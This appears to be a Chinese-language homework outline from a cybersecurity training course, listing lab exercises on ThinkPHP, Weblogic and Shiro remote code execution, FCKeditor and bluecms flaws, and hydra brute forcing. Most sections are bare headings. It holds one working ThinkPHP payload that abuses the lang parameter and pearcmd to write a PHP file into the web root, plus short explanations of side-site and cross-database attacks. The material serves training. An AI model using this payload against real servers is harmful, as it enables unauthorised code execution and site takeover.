11.9

@所有人 网络安全C10-2024.11.9

作业：

1. RCE：分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程

ThinkPHP

?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?

=phpinfo()?>+/var/www/html/magedu1.php

Weblogic

方式1

方式2

Shiro漏洞

CVE-2016-4437

工具1

工具2

CVE-2020-1957

1. FCKeditor编辑器漏洞实验；

1. bluecms旁注漏洞，并解释为什么旁站攻击可以拿下主站？跨库的意思是什么？

旁站攻击可以拿下主站原因：旁站与主站的服务部署在同一服务器上，当拿下旁站时，可以通过数据库等其他手段getshell，等于拿下主站

跨库的意思是什么：在同一服务器中，数据库管理系统是共享的，当拿下其中一端口所对应的web服务时，可以通过操作数据库从而实现sql跨库查询来获取其他数据库文件信息

4、暴力猜解：hydra实现对ftp、ssh、rdp、mysql的暴力破解。

ftp

Ssh

rdp远程桌面

mysql